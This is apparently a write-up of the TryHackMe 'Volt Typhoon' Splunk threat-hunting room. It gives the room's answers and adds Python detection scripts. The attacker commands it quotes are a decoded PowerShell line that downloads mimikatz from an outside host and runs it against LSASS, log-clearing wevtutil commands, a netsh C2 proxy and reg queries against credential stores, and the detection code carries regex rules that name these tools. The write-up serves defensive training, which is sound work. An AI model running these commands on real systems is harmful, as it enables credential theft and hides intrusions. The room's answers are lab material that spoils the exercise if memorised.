Volt Typhoon – TryHackMe

Threat Hunting Scenario Using Splunk

Scenario

The SOC has detected suspicious activity indicative of an advanced persistent threat (APT) group known as Volt Typhoon, notorious for targeting high-value organizations. Assume the role of a security analyst and investigate the intrusion by retracing the attacker’s steps.

You have been provided with various log types from a two-week time frame during which the suspected attack occurred. Your ability to research the suspected APT and understand how they maneuver through targeted networks will prove to be just as important as your Splunk skills.

Connect to OpenVPN or use the AttackBox to access Splunk. Please give the machine about 4 minutes to boot.

Task 2 – Initial Access

Volt Typhoon often gains initial access to target networks by exploiting vulnerabilities in enterprise software. In recent incidents, Volt Typhoon has been observed leveraging vulnerabilities in Zoho ManageEngine ADSelfService Plus, a popular self-service password management solution used by organizations.

Comb through the ADSelfService Plus logs to begin retracing the attacker’s steps. At what time (ISO 8601 format) was Dean’s password changed and their account taken over by the attacker?

Filtering on the ADSelfService Plus logs and on Dean, we find the password was changed after many failed Account Unlock attempts and a single Account Unlock that succeeded.

Shortly after Dean’s account was compromised, the attacker created a new administrator account. What is the name of the new account that was created?

Directly after the password modification, we find an account creation.
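The takeover pattern described above (a burst of failed unlocks, one success, a password change, then a new account from the same source) can be turned into a small detector. This is an added example rather than anything from the room or from ManageEngine: the log layout, every event in it, and the `parse`, `find_takeovers` and `find_new_accounts` helpers are constructed for illustration and only loosely modelled on an ADSelfService Plus audit trail.

```python
"""
Hunt for the account-takeover pattern from Task 2: a burst of failed
Account Unlock attempts, one success, then a password change for the same
user, followed by a new account created from the same source address.
Added example; the log layout and every event below are constructed and
only loosely modelled on an ADSelfService Plus audit trail.
"""
import re
from datetime import datetime, timedelta

# Constructed audit lines: timestamp | action | user | result | source ip
SAMPLE_LOGS = """\
2024-05-01T09:12:04Z | Account Unlock | dean | FAILED | 10.2.30.55
2024-05-01T09:12:41Z | Account Unlock | dean | FAILED | 10.2.30.55
2024-05-01T09:13:19Z | Account Unlock | dean | FAILED | 10.2.30.55
2024-05-01T09:14:02Z | Account Unlock | dean | FAILED | 10.2.30.55
2024-05-01T09:15:47Z | Account Unlock | dean | SUCCESS | 10.2.30.55
2024-05-01T09:17:30Z | Password Change | dean | SUCCESS | 10.2.30.55
2024-05-01T09:21:05Z | Account Create | svc_backup | SUCCESS | 10.2.30.55
2024-05-01T10:02:11Z | Account Unlock | alice | FAILED | 10.2.30.80
2024-05-01T10:02:40Z | Account Unlock | alice | SUCCESS | 10.2.30.80
2024-05-01T10:03:05Z | Password Change | alice | SUCCESS | 10.2.30.80
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \| (?P<action>[^|]+?) \| (?P<user>\S+) \| "
    r"(?P<result>\S+) \| (?P<src>\S+)$"
)
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


def parse(text):
    """Parse the constructed lines into dicts sorted by timestamp."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore lines that do not fit the layout
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], TS_FMT)
        events.append(e)
    return sorted(events, key=lambda e: e["ts"])


def find_takeovers(events, min_failures=3, window=timedelta(minutes=30)):
    """Map user -> {changed_at, src} for password changes preceded, within
    the window, by at least min_failures failed unlocks and one success."""
    by_user = {}
    for e in events:
        by_user.setdefault(e["user"], []).append(e)
    hits = {}
    for user, evs in by_user.items():
        for i, e in enumerate(evs):
            if e["action"] != "Password Change" or e["result"] != "SUCCESS":
                continue
            prior = [p for p in evs[:i]
                     if p["action"] == "Account Unlock" and p["ts"] >= e["ts"] - window]
            failed = sum(1 for p in prior if p["result"] == "FAILED")
            unlocked = any(p["result"] == "SUCCESS" for p in prior)
            if failed >= min_failures and unlocked:
                hits[user] = {"changed_at": e["ts"].strftime(TS_FMT), "src": e["src"]}
    return hits


def find_new_accounts(events, takeover, window=timedelta(minutes=30)):
    """Accounts created from the takeover's source IP shortly after the
    password change: the attacker's persistence step from Task 2."""
    start = datetime.strptime(takeover["changed_at"], TS_FMT)
    return [e["user"] for e in events
            if e["action"] == "Account Create" and e["result"] == "SUCCESS"
            and e["src"] == takeover["src"] and start < e["ts"] <= start + window]


if __name__ == "__main__":
    evs = parse(SAMPLE_LOGS)
    for user, hit in find_takeovers(evs).items():
        print(f"{user}: password changed at {hit['changed_at']} from {hit['src']}; "
              f"new accounts: {find_new_accounts(evs, hit)}")
```

The thresholds (three failures, a 30 minute window) are deliberately loose; the point is that the password change alone is not the signal, the unlock burst immediately before it is. Alice's single failed unlock followed by a legitimate change is not flagged.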

Task 3 – Execution

Volt Typhoon is known to exploit Windows Management Instrumentation Command-line (WMIC) for a range of execution techniques. They leverage WMIC for tasks such as gathering information and dumping valuable databases, allowing them to infiltrate and exploit target networks. By using “living off the land” binaries (LOLBins), they blend in with legitimate system activity, making detection more challenging.

In an information gathering attempt, what command does the attacker run to find information about local drives on server01 & server02?

Filtering on server01 and server02, we find the command was:

wmic /node:server01, server02 logicaldisk get caption, filesystem, freespace, size, volumename

AD databases have the .dit extension, so searching for .dit we find the password was:

d5ag0nm@5t3r

Task 4 – Persistence

Our target APT frequently employs web shells as a persistence mechanism to maintain a foothold. They disguise these web shells as legitimate files, enabling remote control over the server and allowing them to execute commands undetected.

To establish persistence on the compromised server, the attacker created a web shell using base64 encoded text. In which directory was the web shell placed?

Searching for aspx, we find it was placed in:

C:\Windows\Temp

Task 5 – Defense Evasion

Volt Typhoon utilizes advanced defense evasion techniques to significantly reduce the risk of detection. These methods encompass regular file purging, eliminating logs, and conducting thorough reconnaissance of their operational environment.

In an attempt to begin covering their tracks, the attackers remove evidence of the compromise. They first start by wiping RDP records. What PowerShell cmdlet does the attacker use to remove the “Most Recently Used” record?

In PowerShell, Remove-ItemProperty deletes a registry value, which is how the “Most Recently Used” records are wiped. Filtering on it, we find the cmdlet used was:

Remove-ItemProperty

The APT continues to cover their tracks by renaming and changing the extension of the previously created archive. What is the file name (with extension) created by the attackers?

We found previously that the archive was named cisco. Searching for cisco in the logs, we find the new name:

cl64.gif

Under what regedit path does the attacker check for evidence of a virtualized environment?

Searching for virtual in the logs, we find the regedit path:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

Task 6 – Credential Access

Volt Typhoon often combs through target networks to uncover and extract credentials from a range of programs. Additionally, they are known to access hashed credentials directly from system memory.

Using reg query, Volt Typhoon hunts for opportunities to find useful credentials. What three pieces of software do they investigate?

Searching for reg query, we find:

OpenSSH, putty, realvnc

What is the full decoded command the attacker uses to download and run mimikatz?

Searching for the PowerShell encoded-command flags:

-exec bypass -W hidden -nop -E

We find the base64 command:

-exec bypass -W hidden -nop -E SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovL3ZvbHR5cC5jb20vMy90bHovbWltaWthdHouZXhlIiAtT3V0RmlsZSAiQzpcVGVtcFxkYjJcbWltaWthdHouZXhlIjsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFRlbXBcZGIyXG1pbWlrYXR6LmV4ZSIgLUFyZ3VtZW50TGlzdCBAKCJzZWt1cmxzYTo6bWluaWR1bXAgbHNhc3MuZG1wIiwgImV4aXQiKSAtTm9OZXdXaW5kb3cgLVdhaXQ=

Decoding the base64 with CyberChef gives:

Invoke-WebRequest -Uri "http://voltyp.com/3/tlz/mimikatz.exe" -OutFile "C:\Temp\db2\mimikatz.exe"; Start-Process -FilePath "C:\Temp\db2\mimikatz.exe" -ArgumentList @("sekurlsa::minidump lsass.dmp", "exit") -NoNewWindow -Wait
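The same decoding can be scripted so that the indicators (download URL, dropped file, LSASS access) fall out ready for the next Splunk pivot. This is an added example, not part of the writeup or of any tool: the base64 string is the one recovered above, while `decode_encoded_command`, `extract_indicators` and the small UTF-16LE sample are written for this illustration. One caveat worth encoding rather than remembering: PowerShell's -EncodedCommand normally expects UTF-16LE base64, whereas the lab payload is plain UTF-8, so the decoder checks which one it has instead of assuming.

```python
"""
Decode the PowerShell encoded command recovered in Task 6 and pull out the
indicators a hunter would pivot on next (download URL, dropped file,
LSASS access). Added example: the base64 string is the one from the lab
logs; the helper functions and the UTF-16LE sample are constructed here.
"""
import base64
import re

# Payload recovered from the lab logs in Task 6 (split only for line length)
ENCODED = (
    "SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAi"
    "aHR0cDovL3ZvbHR5cC5jb20vMy90bHovbWltaWthdHouZXhlIiAtT3V0RmlsZSAi"
    "QzpcVGVtcFxkYjJcbWltaWthdHouZXhlIjsg"
    "U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFRlbXBcZGIyXG1pbWlrYXR6LmV4ZSIg"
    "LUFyZ3VtZW50TGlzdCBAKCJzZWt1cmxzYTo6bWluaWR1bXAgbHNhc3MuZG1wIiwgImV4aXQiKSAtTm9OZXdXaW5kb3cgLVdhaXQ="
)

# Constructed benign sample in the UTF-16LE form PowerShell itself emits
UTF16_SAMPLE = base64.b64encode("Get-Date".encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Decode a -E / -EncodedCommand payload.

    PowerShell expects UTF-16LE, but lab data and some loaders use UTF-8.
    UTF-16LE text made of ASCII has a null byte in every odd position, so
    count those instead of guessing.
    """
    raw = base64.b64decode("".join(b64.split()), validate=True)
    odd_bytes = raw[1::2]
    if odd_bytes and odd_bytes.count(0) > len(odd_bytes) // 2:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def extract_indicators(cmd: str) -> dict:
    """Pull the values worth searching for elsewhere in the logs."""
    outfiles = re.findall(r'-OutFile\s+"([^"]+)"', cmd)
    return {
        "urls": re.findall(r"https?://[^\s\"']+", cmd),
        "outfile": outfiles[0] if outfiles else None,
        "executed": re.findall(r'-FilePath\s+"([^"]+)"', cmd),
        # sekurlsa / lsass in a command line is the credential-dumping tell
        "touches_lsass": "lsass" in cmd.lower() or "sekurlsa" in cmd.lower(),
    }


if __name__ == "__main__":
    decoded = decode_encoded_command(ENCODED)
    print(decoded)
    for key, value in extract_indicators(decoded).items():
        print(f"{key}: {value}")
```

In practice the URL host, the dropped path and the LSASS reference each become their own Splunk search across the proxy, file and process logs for the same two-week window.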

Task 7 – Discovery & Lateral Movement

Discovery

Volt Typhoon uses enumeration techniques to gather additional information about network architecture, logging mechanisms, successful logins, and software configurations, enhancing their understanding of the target environment for strategic purposes.

Lateral Movement

The APT has been observed moving previously created web shells to different servers as part of their lateral movement strategy. This technique facilitates their ability to traverse through networks and maintain access across multiple systems.

The attacker uses wevtutil, a log retrieval tool, to enumerate Windows logs. What event IDs does the attacker search for?

Filtering on wevtutil logs, we find:

4624 4625 4769

Moving laterally to server-02, the attacker copies over the original web shell. What is the name of the new web shell that was created?

Filtering on server02 logs, we find:

AuditReport.jspx

Task 8 – Collection

During the collection phase, Volt Typhoon extracts various types of data, such as local web browser information and valuable assets discovered within the target environment.

The attacker is able to locate some valuable financial information during the collection phase. What three files does Volt Typhoon make copies of using PowerShell?

In PowerShell, files can be copied using Copy-Item, so filtering on Copy-Item we find:

2022.csv 2023.csv 2024.csv

Task 9 – C2 & Cleanup

C2

Volt Typhoon utilizes publicly available tools as well as compromised devices to establish discreet command and control (C2) channels.

Cleanup

To cover their tracks, the APT has been observed deleting event logs and selectively removing other traces and artifacts of their malicious activities.

The attacker uses netsh to create a proxy for C2 communications. What connect address and port does the attacker use when setting up the proxy?

Filtering on netsh logs, we find:

10.2.30.1 8443

To conceal their activities, what are the four types of event logs the attacker clears on the compromised system?

Filtering on wevtutil logs, we find:

Application Security Setup System
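Most of the hunts in Tasks 3, 5, 6, 7, 8 and 9 come down to the same move: search process command lines for a living-off-the-land binary plus a telling argument (wmic with /node:, wevtutil qe with event IDs, wevtutil cl, Remove-ItemProperty on the RDP history key, reg query against the virtualization and credential-store keys, netsh portproxy, Copy-Item over the CSVs). The block below gathers those into one rule set and runs it over constructed process-creation events. It is an added example, not code from the room: the event lines are built around the commands and values the writeup recovered, and the rule names, regexes and helper functions (`parse_events`, `match_rules`, `cleared_logs`, `queried_event_ids`, `portproxy_targets`) are written for this illustration.

```python
"""
Triage process command lines for the living-off-the-land tradecraft hunted
in Tasks 3, 5, 6, 7, 8 and 9 (wmic, wevtutil, reg query, Remove-ItemProperty,
netsh portproxy, Copy-Item). Added example; the events are constructed
around the commands and values in the writeup, the rules are written here.
"""
import re

# Constructed process-creation events: host | user | command line
SAMPLE_EVENTS = r"""
server01 | CORP\dean | wmic /node:server01, server02 logicaldisk get caption, filesystem, freespace, size, volumename
server01 | CORP\dean | wevtutil qe Security /q:"*[System[(EventID=4624 or EventID=4625 or EventID=4769)]]" /f:text
server01 | CORP\dean | powershell -c "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Terminal Server Client\Default' -Name 'MRU0'"
server01 | CORP\dean | reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation
server01 | CORP\dean | reg query HKCU\Software\SimonTatham\PuTTY\Sessions
server02 | CORP\dean | netsh interface portproxy add v4tov4 listenport=8443 connectaddress=10.2.30.1 connectport=8443
server02 | CORP\dean | powershell -c "Copy-Item C:\Finance\2022.csv,C:\Finance\2023.csv,C:\Finance\2024.csv -Destination C:\Windows\Temp"
server02 | CORP\dean | wevtutil cl Application
server02 | CORP\dean | wevtutil cl Security
server02 | CORP\dean | wevtutil cl Setup
server02 | CORP\dean | wevtutil cl System
server02 | CORP\alice | wevtutil qe Application /c:5 /f:text
server01 | CORP\bob | ipconfig /all
"""

# (rule name, pattern). HKCU\Software\Microsoft\Terminal Server Client\Default
# is where Windows keeps the RDP "Most Recently Used" entries.
RULES = [
    ("wmic remote enumeration", r"\bwmic\b.*\s/node:"),
    ("logon event enumeration", r"\bwevtutil\b\s+qe\b.*EventID="),
    ("event log cleared", r"\bwevtutil\b\s+(?:cl|clear-log)\b"),
    ("rdp mru removal", r"Remove-ItemProperty\b.*Terminal Server Client"),
    ("vm check via registry", r"\breg(?:\.exe)?\s+query\b.*CurrentControlSet\\Control"),
    ("credential store enumeration", r"\breg(?:\.exe)?\s+query\b.*(?:OpenSSH|PuTTY|RealVNC)"),
    ("netsh port proxy", r"\bnetsh\b.*portproxy.*connectaddress="),
    ("bulk file copy", r"Copy-Item\b.*\.csv"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]


def parse_events(text):
    """Split the constructed lines into host / user / command line."""
    events = []
    for line in text.strip().splitlines():
        host, user, cmd = line.split(" | ", 2)
        events.append({"host": host, "user": user, "cmd": cmd})
    return events


def match_rules(events):
    """Return (host, rule, command line) for every rule a command trips."""
    return [(e["host"], name, e["cmd"])
            for e in events for name, rx in COMPILED if rx.search(e["cmd"])]


def cleared_logs(events):
    """Names of the event logs wiped with wevtutil cl (Task 9)."""
    out = set()
    for e in events:
        out.update(re.findall(r"\bwevtutil\b\s+(?:cl|clear-log)\s+(\S+)", e["cmd"], re.I))
    return sorted(out)


def queried_event_ids(events):
    """Event IDs pulled with wevtutil qe (Task 7)."""
    ids = set()
    for e in events:
        if re.search(r"\bwevtutil\b\s+qe\b", e["cmd"], re.I):
            ids.update(re.findall(r"EventID=(\d+)", e["cmd"]))
    return sorted(ids)


def portproxy_targets(events):
    """(connect address, connect port) pairs from netsh portproxy (Task 9)."""
    out = []
    for e in events:
        m = re.search(r"\bnetsh\b.*portproxy.*connectaddress=(\S+).*connectport=(\d+)",
                      e["cmd"], re.I)
        if m:
            out.append((m.group(1), m.group(2)))
    return out


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for host, rule, cmd in match_rules(evs):
        print(f"{host}: {rule}: {cmd}")
    print("cleared:", cleared_logs(evs))
    print("event ids:", queried_event_ids(evs))
    print("portproxy:", portproxy_targets(evs))
```

The logon-enumeration rule requires an EventID filter on purpose: a plain wevtutil qe, like alice's five-record Application pull, is routine administration and stays out of the results. In Splunk the same patterns go straight into `| regex CommandLine="..."` against the process-creation events, and the four cleared logs (Application, Security, Setup, System) are themselves a strong pivot, since a host whose Security log was emptied is exactly where the earlier wmic and reg query activity will be missing.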